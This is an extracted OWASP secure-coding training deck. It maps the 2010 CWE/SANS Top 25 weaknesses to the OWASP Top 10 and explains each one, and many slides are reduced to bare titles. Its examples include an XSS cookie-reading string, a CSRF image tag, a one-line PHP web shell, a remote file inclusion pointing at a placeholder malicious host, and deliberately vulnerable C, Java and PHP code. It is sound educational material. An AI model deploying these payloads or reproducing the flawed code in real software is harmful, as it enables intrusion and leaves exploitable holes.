The OWASP Foundationhttp://www.owasp.org

OWASP EducationComputer based training

2010 CWE/SANS Top 25 with OWASP Top 10 and PCI DSS V2 Mapping

Nishi KumarIT Architect Specialist, FISOWASP CBT Project Lead

OWASP Global Industry CommitteeNishi.Kumar@owasp.org

Keith TurpinThe Boeing Company

OWASP Secure Coding Practices LeadOWASP Global Projects Committee

keith.turpin@owasp.org

2

Objectives

Provide an overview of the 2010 CWE/SANS Top 25

Discuss mapping relationships between CWE/SANS Top 25, OWASP Top 10 for 2010 and PCI DSS V2

Understand the CWE/SANS Top 25 weaknesses andhow to remediate them

Organizations

MITRE - http://www.mitre.org/The MITRE Corporation is a not-for-profit organization that manages several Federally Funded Research and Development Centers. Mitre currently runs various IT security projects including the Common Weakness Enumeration (CWE) and it is the official source for the CWE/SANS Top 25 Most Dangerous Software Errors.

CWE Database - http://cwe.mitre.org/

SANS - http://www.sans.org

The SysAdmin, Audit, Network, Security (SANS) Institute operates as a commercial research and education company. SANS is well known for its Internet Storm Center, its comprehensive list computing security training programs and its work with Mitre on the CWE/SANS Top 25 Most Dangerous Software Errors.

3

Selection and Ranking

Builds on the original 2009 version

Methodology - Qualitative rather than quantitative

Factors in ranking - Prevalence and Severity

Initially started with 41 candidate weaknesses

4

5

2010 CWE/SANS Top 25Rank ID Name

[1] CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

[2] CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

[3] CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

[4] CWE-352 Cross-Site Request Forgery (CSRF)[5] CWE-285 Improper Authorization[6] CWE-807 Reliance on Untrusted Inputs in a Security Decision[7] CWE-22 Improper Limitation of a Pathname to a Restricted Directory

('Path Traversal')[8] CWE-434 Unrestricted Upload of File with Dangerous Type[9] CWE-78 Improper Neutralization of Special Elements used in an OS

Command ('OS Command Injection')[10] CWE-311 Missing Encryption of Sensitive Data[11] CWE-798 Use of Hard-coded Credentials[12] CWE-805 Buffer Access with Incorrect Length Value

6

SANS CWE Top 25

Rank ID Name[13] CWE-98 Improper Control of Filename for Include/Require

Statement in PHP Program ('PHP File Inclusion')[14] CWE-129 Improper Validation of Array Index[15] CWE-754 Improper Check for Unusual or Exceptional Conditions[16] CWE-209 Information Exposure Through an Error Message[17] CWE-190 Integer Overflow or Wraparound[18] CWE-131 Incorrect Calculation of Buffer Size[19] CWE-306 Missing Authentication for Critical Function[20] CWE-494 Download of Code Without Integrity Check[21] CWE-732 Incorrect Permission Assignment for Critical Resource[22] CWE-770 Allocation of Resources Without Limits or Throttling[23] CWE-601 URL Redirection to Untrusted Site ('Open Redirect')[24] CWE-327 Use of a Broken or Risky Cryptographic Algorithm[25] CWE-362 Concurrent Execution using Shared Resource with

Improper Synchronization ('Race Condition')

7

OWASP Top 10 & SANS CWE Top 25 mapping

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

http://www.sans.org/top25-software-errors/http://cwe.mitre.org/top25/

A1: Injection [2] CWE-89:

[9] CWE-78:

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

A2: Cross-Site Scripting (XSS)

[1] CWE-79: Improper Neutralization of Input During Web Page Generation('Cross-site Scripting')

A3: Broken Authentication and Session Management

[19] CWE-306:[11] CWE-798:

Missing Authentication for Critical FunctionUse of Hard-coded Credentials

A4: Insecure Direct Object References [5] CWE-285:[6] CWE-807:

[7] CWE-22:

Improper AuthorizationReliance on Untrusted Inputs in a Security DecisionImproper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

A5: Cross-Site Request Forgery (CSRF) [4] CWE-352: Cross-Site Request Forgery (CSRF)

8

OWASP Top 10 & SANS CWE Top 25 mapping

A6: Security Misconfiguration [16] CWE-209: Information Exposure Through an Error Message (Only partially covers OWASP Risk)

A7: Insecure Cryptographic Storage

[10] CWE-311: [24] CWE-327:

Missing Encryption of Sensitive Data Use of a Broken or Risky Cryptographic Algorithm

A8: Failure to Restrict URL Access

[5] CWE-285:

[21] CWE-732:

Improper Authorization (Also listed with OWASP A-4)Incorrect Permission Assignment for Critical Resource (CWE-732 covers a broader scope than OWASP A8)

A9: Insufficient Transport Layer Protection

[10] CWE-311:

[24] CWE-327:

Missing Encryption of Sensitive Data (Also listed with OWASP A-7)Use of a Broken or Risky Cryptographic Algorithm (Also listed with OWASP A-7)

A10: Unvalidated Redirects and Forwards

[23] CWE-601: URL Redirection to Untrusted Site ('Open Redirect')

9

SANS CWE Top 25The following do not directly map to the OWASP Top 10 2010

[3] CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

[8] CWE-434: Unrestricted Upload of File with Dangerous Type

[12] CWE-805: Buffer Access with Incorrect Length Value

[13] CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')

[14] CWE-129: Improper Validation of Array Index

[15] CWE-754: Improper Check for Unusual or Exceptional Conditions

[17] CWE-190: Integer Overflow or Wraparound

[18] CWE-131: Incorrect Calculation of Buffer Size

[20] CWE-494: Download of Code Without Integrity Check

[22] CWE-770: Allocation of Resources Without Limits or Throttling

[25] CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Mapping Considerations

SANS CWE Top 25 is only a fraction of the full CWE list of weaknesses

SANS CWE Top 25 target both web and non-web applications

OWASP defines ten risks focused on web applications

OWASP's list tends to have broader weaknesses - made up of several specific vulnerabilities

PCI DSS Requirements point to both as industry best practices

10

[1] CWE-79Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

11

Try this in your browser: <script>javascript:alert(document.cookie)</script>

[1] CWE-79Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

12

E.g. output encoding < becomes &lt;, > becomes &gt; & becomes &amp; and " becomes &quot <script> -> &lt;script&gt; (markup)

[2] CWE-89Improper Neutralization of Special Elements used in an SQL Command('SQL Injection')

13

14

[2] CWE-89Improper Neutralization of Special Elements used in an SQL Command('SQL Injection')

Example: C

char last_name[20]; ...................................Declare array with 20 character limitprintf ("Enter your last name: ");scanf ("%s", last_name); ...........................Get input (no limit) and store in array

The software does not limit the size of the name entered by the user, so an entry of more than 20 characters will cause a buffer overflow, since the "last_name" array can only hold 20 characters

[3] CWE-120Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

15

[3] CWE-120Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

16

Example of a legitimate request:http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243

Example or a forged request using a hidden image tag:<img src=http://example.com/app/transferFunds?amount=1500&destinationAccount=

attackersAcct# width="0" height="0" />

[4] CWE-352Cross-Site Request Forgery (CSRF)

17

[4] CWE-352Cross-Site Request Forgery (CSRF)

18

[5] CWE-285 Improper Authorization

19

[5] CWE-285 Improper Authorization

20

[6] CWE-807Reliance on Untrusted Inputs in a Security Decision

21

[6] CWE-807Reliance on Untrusted Inputs in a Security Decision

22

[7] CWE-22Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

23

[7] CWE-22Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

24

[8] CWE-434Unrestricted Upload of File with Dangerous Type

25

Example: PHP<?phpsystem($_GET['cmd']);?>

[8] CWE-434Unrestricted Upload of File with Dangerous Type

26

[9] CWE-78Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

27

28

[9] CWE-78Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

[10] CWE-311Missing Encryption of Sensitive Data

29

[10] CWE-311Missing Encryption of Sensitive Data

30

[11] CWE-798Use of Hard-coded Credentials

31

[11] CWE-798Use of Hard-coded Credentials

32

[12] CWE-805Buffer Access with Incorrect Length Value

33

[12] CWE-805Buffer Access with Incorrect Length Value

34

[13] CWE-98Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')

35

Example: PHP$dir = $_GET['module_name'];include($dir . "/function.php");

Malicious call to a remote file: /victim.php?module_name=http://malicious.example.com

[13] CWE-98Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')

36

[14] CWE-129Improper Validation of Array Index

37

Example: Javapublic String getValue(int index) {return array[index];}

If index is outside of the range of the array, this may result in an ArrayIndexOutOfBounds Exception being raised

[14] CWE-129Improper Validation of Array Index

38

[15] CWE-754Improper Check for Unusual or Exceptional Condition

39

Example: Java(Bad Code)Example Language: Java String itemName = request.getParameter(ITEM_NAME);if (itemName.compareTo(IMPORTANT_ITEM) == 0) {

...}

The code does not check to see if the string returned by getParameter() is null before calling the member function compareTo(), potentially causing a NULL dereference.

[15] CWE-754Improper Check for Unusual or Exceptional Condition

40

[16] CWE-209Information Exposure Through an Error Message

41

Example: Javatry {

/.../} catch (Exception e) { System.out.println(e);}If this output is redirected to a web user, this may represent a security problemIn the following example, sensitive information might be printed depending on the exception that occurs. If an exception related to SQL is handled by the catch, then the output might contain sensitive information such as SQL query structure or private information.

[16] CWE-209Information Exposure Through an Error Message

42

[17] CWE-190Integer Overflow or Wraparound

43

Example: Cnresp = packet_get_int();if (nresp > 0) {response = xmalloc(nresp*sizeof(char*));for (i = 0; i > nresp; i++) response[i] = packet_get_string(NULL);}

If nresp has the value 1073741824 and sizeof(char*) has its typical value of 4, then the result of the operation nresp*sizeof(char*) overflows, and the argument to xmalloc() will be 0, causing the subsequent loop iterations to overflow the heap buffer response

[17] CWE-190Integer Overflow or Wraparound

44

[18] CWE-131Incorrect Calculation of Buffer Size

45

Example: Cint *id_sequence;id_sequence = (int*) malloc(3);if (id_sequence == NULL) exit(1);id_sequence[0] = 13579;id_sequence[1] = 24680;id_sequence[2] = 97531;

The size parameter used during the malloc() call is set to '3' which results in a buffer of 3 bytes. The intent was to create a buffer that holds three ints, and in C, each int requires 4 bytes, so an array of 12 bytes is needed. Executing the above code could result in a buffer overflow as 12 bytes of data is being saved into 3 bytes worth of allocated space

[18] CWE-131Incorrect Calculation of Buffer Size

46

[19] CWE-306Missing Authentication for Critical Function

47

[19] CWE-306Missing Authentication for Critical Function

48

[20] CWE-494Download of Code Without Integrity Check

49

Example: Java URL[] classURLs= new URL[]{new URL("file:subdir/")};URLClassLoader loader = new URLClassLoader(classURLs);Class loadedClass = Class.forName("loadMe", true, loader);

This code does not ensure that the class loaded is the intended one, for example by verifying the class's checksum.

[20] CWE-494Download of Code Without Integrity Check

50

[21] CWE-732Incorrect Permission Assignment for Critical Resource

51

[21] CWE-732Incorrect Permission Assignment for Critical Resource

52

[22] CWE-770Allocation of Resources Without Limits or Throttling

53

Example: C and C++ sock=socket(AF_INET, SOCK_STREAM, 0);while (1) {newsock=accept(sock, ...);printf("A connection has been accepted\n");pid = fork();}

This code allocates a socket and forks each time it receives a new connection. The program does not track how many connections have been made, and it does not limit the number of connections. A large number of connections could cause the system to run out of resources

[22] CWE-770Allocation of Resources Without Limits or Throttling

54

[23] CWE-601URL Redirection to Untrusted Site ('Open Redirect')

55

Example: PHP $redirect_url = $_GET['url'];header("Location: " . $redirect_url);

This page could be used as part of a phishing scam by initialing on a trusted domain, but redirecting users to a malicious site. An attacker could supply a user with the following link:

http://example.com/example.php?url=http://malicious.example.com

This is the same URL only obfuscated with URL encoding to mask the off site redirect: http://example.com/example.php?url=%68%74%74%70%3a%2f%2f%6d%61%6c%69%63%69%6f%75%73%2e%65%78%61%6d%70%6c%65%2e%63%6f%6d

[23] CWE-601URL Redirection to Untrusted Site ('Open Redirect')

56

[24] CWE-327Use of a Broken or Risky Cryptographic Algorithm

57

[24] CWE-327Use of a Broken or Risky Cryptographic Algorithm

58

[25] CWE-362Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

59

[25] CWE-362Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

60

61